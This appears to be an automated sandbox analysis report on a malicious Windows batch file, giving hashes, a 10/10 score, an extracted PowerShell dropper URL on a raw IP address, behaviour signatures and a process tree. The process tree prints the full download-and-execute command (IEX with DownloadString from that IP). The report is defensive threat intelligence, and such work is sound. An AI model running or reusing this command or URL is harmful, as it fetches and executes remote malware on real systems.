Analysis
-
max time kernel
105s -
max time network
142s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
01-03-2020 04:10
General
-
Target
HtYRZhCc.bat
-
Size
189B
-
MD5
d0eafb36abcfd1c15e9bef86bcf280b0
-
SHA1
c4c71e785acaa2543c8ff32db8dbbf49761b78dd
-
SHA256
2f8423a9b51942cea3d3e71e185c4e5780a8dc51cfc5fc0d84d08ad9efe067a5
-
SHA512
f75e1a19ca43ab9fbb7e99cdebce8ceca51922258cff04724e811eecfee88a050b1c496580a498ecc845c67abf7ce14b37bf80c0f4fd9d5c300d4bff1b8c9cd5
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/HtYRZhCc
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\HtYRZhCc.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/HtYRZhCc');Invoke-HELKUY;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB